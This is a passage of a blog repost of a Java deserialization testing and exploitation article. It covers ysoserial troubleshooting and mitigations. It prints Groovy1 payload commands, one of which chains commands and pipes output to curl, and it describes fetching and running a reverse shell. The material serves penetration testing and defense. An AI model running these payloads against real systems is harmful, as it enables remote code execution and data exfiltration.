<h2 id="SerialUID-Mismatch-InvalidClassException"><a href="#SerialUID-Mismatch-InvalidClassException" class="headerlink" title="SerialUID Mismatch / InvalidClassException"></a>SerialUID Mismatch / InvalidClassException</h2><p><code>SerialUID</code> is an unique class identifier which helps JVM to ensure integrity of serialized object’s version. Quoting Java docs: <em>“The serialization runtime associates with each serializable class a version number, called a serialVersionUID, which is used during deserialization to verify that the sender and receiver of a serialized object have loaded classes for that object that are compatible with respect to serialization. If the receiver has loaded a class for the object that has a different serialVersionUID than that of the corresponding sender’s class, then deserialization will result in an</em> <a target="_blank" rel="noopener" href="https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/io/InvalidClassException.html"><em>InvalidClassException</em></a><em>. A serializable class can declare its own serialVersionUID explicitly by declaring a field named serialVersionUID that must be static, final, and of type long”</em></p>
<p>In short, SerialVersionUID mismatch might occur if you use different library version to construct your serialized payload (e.g. 1.2 instead of 1.3). In order to fix it, you can:</p>
<ul>
<li><p>try various versions of library which contains the faulty class</p>
</li>
<li><p>use java debugger to fix the serialUID in runtime</p>
</li>
</ul>
<p>A <a target="_blank" rel="noopener" href="https://rhinosecuritylabs.com/research/java-deserializationusing-ysoserial/">great article by RhinoSecurityLabs</a> shows how to deal with such issue in real life scenario.</p>
<h2 id="Filter-status-REJECTED"><a href="#Filter-status-REJECTED" class="headerlink" title="Filter status REJECTED"></a>Filter status REJECTED</h2><p>Message “filter status REJECTED” present in the stack trace means that application employs serialization filtering, which in turn means that it can be hardened. Serialization filters are one of recommended ways to deal with unsafe deserialization, and they restrict which types of data can be instantiated during deserialization and which cannot.</p>
<h2 id="java-io-IOException-Cannot-run-program-“xyz”"><a href="#java-io-IOException-Cannot-run-program-“xyz”" class="headerlink" title="java.io.IOException: Cannot run program “xyz”"></a>java.io.IOException: Cannot run program “xyz”</h2><p>This means that your payload is working but the program to be executed was not found. This can be due to missing binary or OS mismatch (e.g. you try to run notepad.exe on Linux)</p>
<p>Also, there are two more popular issues not related to stack traces:</p>
<h2 id="Shell-commands-not-working"><a href="#Shell-commands-not-working" class="headerlink" title="Shell commands not working"></a>Shell commands not working</h2><p>When constructing a command to be executed by ysoserial’s payload on Linux, you need to be aware that piping and output redirectors will not work. Also, if there are spaces in arguments to main commands arguments (like <code>sh -c &quot;python -c \\&quot;import pty…\\&quot;&quot;</code>)</p>
<p>This is because the final RCE sink, Java’s <code>Runetime.exec()</code> function, is not executed by bash itself, so typical bash features won’t be available. <a target="_blank" rel="noopener" href="https://codewhitesec.blogspot.com/2015/03/sh-or-getting-shell-environment-from.html">There’s a detailed explanation by CodeWhiteSec if you want to understand, why</a>. If you want to execute a chained command using ysoserial, use</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java -jar ysoserial.jar Groovy1 <span class="string">&#x27;sh -c $@|sh . echo [now you can chain commands and use spaces in arguments here]&#x27;</span></span><br></pre></td></tr></table></figure>
<p>e.g.</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java -jar ysoserial.jar Groovy1 <span class="string">&#x27;sh -c $@|sh . echo id | curl http://localhost:1234&#x27;</span></span><br></pre></td></tr></table></figure>
<p>Of course, it’s not a must and if you have already achieved a single command execution, you can also do the same thing by executing several commands like download reverse shell with curl from your machine, then <code>chmod +x</code> the reverse shell and then execute it to connect back to you.</p>
<h2 id="Anticipating-Java-version-without-any-evidence"><a href="#Anticipating-Java-version-without-any-evidence" class="headerlink" title="Anticipating Java version without any evidence"></a>Anticipating Java version without any evidence</h2><p>It is likely that Java version on target machine is up to date. Also, even if it’s not latest version, the JEP290 patch which targets serialization works also with older versions (at least JDK 1.7u21 or newer). But keep in mind, that many Java applications are often a large appliances that have many dependencies. There is high likelihood of not updating them by their owners as they are afraid of breaking them. If an application is a virtual appliance (shipped with underlying OS), then there is a likelihood that the Java version is still the same as when it was released.</p>
<h1 id="应对策略"><a href="#应对策略" class="headerlink" title="应对策略"></a>应对策略</h1><p>First and most important: do not deserialize arbitrary data. If you are already doing it in your application, you can do the following</p>
<ul>
<li><p>Employ open source solutions like <a target="_blank" rel="noopener" href="https://github.com/ikkisoft/SerialKiller">SerialKiller</a> or <a target="_blank" rel="noopener" href="https://github.com/Contrast-Security-OSS/contrast-rO0">Contrast-rO0</a> (均放弃维护)</p>
</li>
<li><p>Use built-in serialization filtering</p>
</li>
</ul>
<p>It is sometimes difficult to prove that a serialization flaw poses security risk. There is limited number of gadget chains available publicly, and developing a custom gadget chain is a non-trivial task.</p>
<p>It is difficult to convince anybody, that the fact, that an application does an arbitrary DNS resolution should be classified as high impact. So basically, if you do not have a working gadget chain, unfortunately the deserialization flaw you found is a classic example of “low likelihood of high impact”.</p>
<p>Anyway, any insecure deserialization detected should be patched — even if there seems to be no impact, keep in mind, that appearance of new gadget chain can instantly turn it into an RCE.</p>
<p>• <a target="_blank" rel="noopener" href="https://github.com/NickstaDB/SerializationDumper">https://github.com/NickstaDB/SerializationDumper</a></p>
<p>• <a target="_blank" rel="noopener" href="https://gist.github.com/coekie">https://gist.github.com/coekie</a></p>
<p>• <a target="_blank" rel="noopener" href="https://github.com/frohoff/ysoserial">https://github.com/frohoff/ysoserial</a></p>
<p>• <a target="_blank" rel="noopener" href="https://github.com/artsploit/rogue-jndi">https://github.com/artsploit/rogue-jndi</a></p>
<p>• <a target="_blank" rel="noopener" href="https://www.veracode.com/blog/research/exploiting-jndi-injections-java">https://www.veracode.com/blog/research/exploiting-jndi-injections-java</a></p>
<p>• <a target="_blank" rel="noopener" href="https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/">https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/</a></p>
<p>• <a target="_blank" rel="noopener" href="https://github.com/wh1t3p1g/ysoserial">https://github.com/wh1t3p1g/ysoserial</a></p>
<p>• <a target="_blank" rel="noopener" href="https://github.com/federicodotta/ysoserial">https://github.com/federicodotta/ysoserial</a></p>
<p>• <a target="_blank" rel="noopener" href="https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet">https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet</a></p>
<p><strong>Author:</strong> Lukasz Mikula. You can follow me on Linkedin (<a target="_blank" rel="noopener" href="https://www.linkedin.com/in/lukaszmikula/">https://www.linkedin.com/in/lukaszmikula/</a>) or Twitter (<a target="_blank" rel="noopener" href="https://twitter.com/0xluk3">@0xluk3</a>)</p>
<p><a target="_blank" rel="noopener" href="https://afinepl.medium.com/testing-and-exploiting-java-deserialization-in-2021-e762f3e43ca2">原文地址</a></p>

    </div>

    
    
    
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>Post author:  </strong>zh2
  </li>
  <li class="post-copyright-link">
    <strong>Post link: </strong>
    <a href="http://zanderchang.github.io/2021/04/23/2021%E5%B9%B4JAVA%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%9A%84%E6%B5%8B%E8%AF%95%E4%B8%8E%E5%88%A9%E7%94%A8/" title="2021年JAVA反序列化的测试与利用">http://zanderchang.github.io/2021/04/23/2021年JAVA反序列化的测试与利用/</a>
  </li>
  <li class="post-copyright-license">
    <strong>Copyright Notice:  </strong>All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> unless stating additionally.
  </li>
</ul>
</div>


      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/Java/" rel="tag"># Java</a>
              <a href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" rel="tag"># 反序列化</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/10/25/LD-AUDIT%E5%AF%B9%E6%8A%97LD-PRELOAD/" rel="prev" title="LD_AUDIT对抗LD_PRELOAD">
      <i class="fa fa-chevron-left"></i> LD_AUDIT对抗LD_PRELOAD
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#TLDR"><span class="nav-number">1.</span> <span class="nav-text">TLDR</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%A6%82%E8%BF%B0"><span class="nav-number">2.</span> <span class="nav-text">反序列化概述</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E6%88%90%E5%9B%A0"><span class="nav-number">3.</span> <span class="nav-text">反序列化漏洞成因</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%90%86%E8%A7%A3%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8D%8F%E8%AE%AE"><span class="nav-number">4.</span> <span class="nav-text">理解反序列化协议</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Ysoserial"><span class="nav-number">5.</span> <span class="nav-text">Ysoserial</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#FileUpload-Wicket"><span class="nav-number">5.1.</span> <span class="nav-text">FileUpload, Wicket</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#RMI%E7%9B%B8%E5%85%B3"><span class="nav-number">5.2.</span> <span class="nav-text">RMI相关</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Object-Lookup-JNDI"><span class="nav-number">5.3.</span> <span class="nav-text">Object Lookup (JNDI)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#URLDNS"><span class="nav-number">5.4.</span> <span class="nav-text">URLDNS</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Jython-Myfaces"><span class="nav-number">5.5.</span> <span class="nav-text">Jython, Myfaces</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#RCE"><span class="nav-number">5.6.</span> <span class="nav-text">RCE</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#DoS"><span class="nav-number">5.7.</span> <span class="nav-text">DoS</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Other-public-exploits-amp-payloads"><span class="nav-number">5.8.</span> <span class="nav-text">Other public exploits &amp; payloads</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%B8%B8%E8%A7%81%E9%97%AE%E9%A2%98"><span class="nav-number">6.</span> <span class="nav-text">常见问题</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#ClassNotFound-Exception"><span class="nav-number">6.1.</span> <span class="nav-text">ClassNotFound Exception</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#SerialUID-Mismatch-InvalidClassException"><span class="nav-number">6.2.</span> <span class="nav-text">SerialUID Mismatch &#x2F; InvalidClassException</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Filter-status-REJECTED"><span class="nav-number">6.3.</span> <span class="nav-text">Filter status REJECTED</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#java-io-IOException-Cannot-run-program-%E2%80%9Cxyz%E2%80%9D"><span class="nav-number">6.4.</span> <span class="nav-text">java.io.IOException: Cannot run program “xyz”</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Shell-commands-not-working"><span class="nav-number">6.5.</span> <span class="nav-text">Shell commands not working</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Anticipating-Java-version-without-any-evidence"><span class="nav-number">6.6.</span> <span class="nav-text">Anticipating Java version without any evidence</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%BA%94%E5%AF%B9%E7%AD%96%E7%95%A5"><span class="nav-number">7.</span> <span class="nav-text">应对策略</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">zh2</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">26</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">22</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">27</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>



      </div>
        <div class="back-to-top motion-element">
          <i class="fa fa-arrow-up"></i>
          <span>0%</span>
        </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">zh2</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script><!-- hexo-inject:begin --><!-- hexo-inject:end -->




  















  

  

</body>
</html>
